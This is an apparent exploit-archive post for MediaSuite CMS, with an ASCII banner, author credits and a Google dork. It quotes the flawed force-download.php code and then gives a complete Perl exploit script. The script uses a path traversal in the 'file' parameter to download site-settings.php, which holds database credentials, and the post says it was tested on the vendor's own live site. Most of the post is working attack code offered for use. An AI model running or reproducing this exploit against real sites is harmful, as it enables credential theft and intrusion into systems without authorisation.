扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 |
.______________ ||__/||_____\ _\_______ ____ ||\/ ||\\///_\\___ \_/ __ \ |\/^ /><\\_/ \| \/\___/ |___|/\____ |/__/\_ \\_____/__|\___> \/|__|\/\/\/ _____________________________ / _____/\_ _____/\_ ___ \ \_____\|__)_ /\\/http://twitter.com/h4SEC /\ |\\ \____ Proof Video: https://www.youtube.com/watch?v=7yxbfD1YK8Y /_______//_______/ \______/ ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] E-Mail : knockout@e-mail.com.tr [~] Twitter: http://twitter.com/h4SEC [~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org - http://www.fiXen.org [~] Greetz: ZoRLu, DaiMon, VolqaN, DaiMon, KedAns-Dz , Septemb0x, BARCOD3, b3mb4m, SysToxic, EthicalHacker and all TurkSec Group members. ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : MediaSuite CMS - Artibary File Disclosure Exploit |~Price : N/A |~Version : All CMS |~Software: http://www.mediasuite.ca |~Vulnerability Style :File Disclosure |~Vulnerability Dir : / |~Google Dork : "MediaSuite.ca - Website Design, Media Marketing Suite - Barrie Ontario" |[~]Date : "20.04.2015" |[~]Exploit Tested on :>>>> www.mediasuite.ca ( Official Web ) <<<<< ---------------------------------------------------------- ---------------------Info;-------------------------------- ---------------------------------------------------------- can be easily found in any database password for this "site-settings.php" will be sufficient to read possible to read the file on the local database. incorrect coding and unconscious in it causing ""force-download.php"" file. that's laughter reason codes:) ################################################################################################## file in "force-download.php" .. .. .. $type = $_GET['type']; $file = $_GET['file']; if($type == "1"){ $filename = "../uploads/$file"; } .. .. .. } header("Pragma: public"); // required header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: private",false); // required for certain browsers header("Content-Type: $ctype"); // change, added quotes to allow spaces in filenames, by Rajkumar Singh header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" ); header("Content-Transfer-Encoding: binary"); header("Content-Length: ".filesize($filename)); readfile("$filename"); exit(); .. ... ################################################################################################## ##############################Exploit.pl######################################################### ################################################################################################## use LWP::Simple; use LWP::UserAgent; system('cls'); system('title MediaSuite CMS - Artibary File Disclosure Exploit'); system('color 2'); if(@ARGV < 2) { print "[-]Su Sekilde Kocum. \n\n"; &help; exit(); } sub help() { print "[+] Usaqe : perl $0 Target /path/ \n"; print "[+] Usage: perl $0 localhost / \n"; } print "\n************************************************************************\n"; print "\* MediaSuite CMS - Artibary File Disclosure Exploit *\n"; print "\* Exploit coded by : KnocKout*\n"; print "\* Contact : twitter.com/h4SEC *\n"; print "\* --*\n"; print "\*********************************************************************\n\n\n"; ($TargetIP, $path, $File,) = @ARGV; $File="includes/force-download.php?type=1&file=../includes/site-settings.php"; my $url = "http://" . $TargetIP . $path . $File; print "\n Biraz Bekle. \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "site-settings.php"); if ($request->is_success) { print "[+] Exploit Basarili, kodlayanin eline saglik \n\n"; print "[+] Exploit Basarili. !\n"; print "[+] Database bilgilerinin yer aldigi (site-settings.php) dosyasi indirildi. \n"; print "[+] h4 SEC \n"; print "[+] Special tnX : ZoRLu, _UnDeRTaKeR, DaiMon, VoLqaN, BARCOD3, Septemb0x, EthicalHacker \n"; exit(); } else { print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n"; exit(); } |
体验盒子
